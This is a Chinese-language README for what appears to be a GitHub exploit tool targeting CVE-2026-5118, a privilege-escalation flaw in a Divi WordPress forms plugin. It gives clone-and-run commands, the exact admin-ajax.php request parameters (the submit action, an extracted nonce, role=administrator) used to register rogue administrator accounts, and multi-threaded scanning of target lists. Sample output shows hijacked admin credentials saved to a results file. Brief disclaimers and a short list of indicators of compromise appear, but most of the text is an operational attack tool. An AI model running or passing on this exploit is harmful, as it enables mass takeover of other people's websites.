⚠️ 警告:此工具仅供授权渗透测试和安全研究使用。
未经授权访问计算机系统是违法的。仅可在您拥有或已获得明确书面许可的系统上使用。 更多免责声明:您可以在 Jenderal92 的封面上查看。请点击此处 !!!
此 Python 2 脚本利用了 Divi WordPress 插件(及相关 Divi 表单)中的权限提升漏洞。它可以通过以下方式远程注册一个管理员账户:
fb_nonce。/wp-admin/admin-ajax.php 发送带有 role=administrator 的精心构造的 multipart 请求。https://。de_fb_obj)。success、user_id、user created 等)。results.txt,格式为:https://target.com/wp-admin/ | username | passwordurllib2、Queue、threading – 未经修改无法兼容 Python 3)git clone https://github.com/Jenderal92/CVE-2026-5118.git
cd CVE-2026-5118
chmod +x CVE-2026-5118.py
创建一个文本文件,每行包含一个域名或 URL。您可以省略 http:// / https:// – 脚本默认会添加 https://。
示例 targets.txt:
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
test-site.org
python CVE-2026-5118.py targets.txt
[*] Total targets : 4
[*] Credentials : Attacker / Attacker@123#+
[*] Threads : 20
[*] Output file : results.txt
[1] Checking https://example.com
[+] SUCCESS! https://example.com/wp-admin/
[2] Checking https://vulnerable-site.com
[+] SUCCESS! https://vulnerable-site.com/wp-admin/
[3] Checking http://192.168.1.100/wordpress
[3] FAILED http://192.168.1.100/wordpress
[4] Checking https://test-site.org
[4] FAILED https://test-site.org
=== DONE ===
Successful: 2 / 4
results.txt)https://example.com/wp-admin/|Attacker|Attacker@123#+
https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+
您可以在脚本顶部自定义以下变量:
https://。fb_nonce。multipart/form-data POST 请求:
action=de_fb_ajax_submit_ajax_handlerfb_nonce=<extracted nonce>role=administratorde_fb_user_login / user_loginde_fb_user_pass / user_passde_fb_user_email / user_email对于使用 Divi 的 WordPress 管理员:
admin-ajax.php 请求。role 参数的注册表单。入侵指标(IOC):
action=de_fb_ajax_submit_ajax_handler 的异常 admin-ajax.php 请求Attacker)的新管理员用户role=administrator 的 POST 数据本软件仅用于教育目的和经授权的安全测试。作者不对因使用本工具而造成的滥用或损害承担任何责任。使用本软件即表示您同意:
违反这些条款可能导致刑事起诉、罚款或监禁。
欢迎提交拉取请求以进行改进(Python 3 移植、更好的 nonce 提取、额外的注册路径检测)。请保留道德免责声明。
| 变量 | 默认值 | 描述 |
|---|
DEFAULT_USERNAME | Attacker | 要注册的用户名 |
DEFAULT_PASSWORD | Attacker@123#+ | 密码(包含特殊字符的强密码) |
DEFAULT_EMAIL | [email protected] | 电子邮件地址 |
THREAD_COUNT | 20 | 并发线程数 |
OUTPUT_FILE | results.txt | 保存成功目标的文件 |